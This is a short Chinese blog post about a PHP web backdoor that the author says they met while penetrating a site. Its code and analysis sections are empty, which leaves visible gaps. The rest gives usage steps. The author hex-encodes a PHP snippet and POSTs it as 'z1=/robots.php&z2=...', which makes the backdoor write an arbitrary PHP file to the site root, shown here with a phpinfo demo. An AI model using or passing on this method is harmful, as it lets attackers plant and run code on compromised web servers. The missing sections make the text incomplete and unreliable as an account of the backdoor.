又一款超强PHP后门

  • 发表于
  • 周边

这个后门是在渗透某站时遇到的,贴代码:


下面分析一下这个代码


另外给出此后门的利用方式:

先把要写入的内容URL编码,比如:


编码后:

%3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%20%3F%3E

然后去掉里面的百分号(%)得到:

3C3F70687020706870696E666F28293B203F3E

然后给后门POST内容:

z1=/robots.php&z2=3C3F70687020706870696E666F28293B203F3E

可以看到phpinfo已经写入到根目录下的robots.php:
PHP后门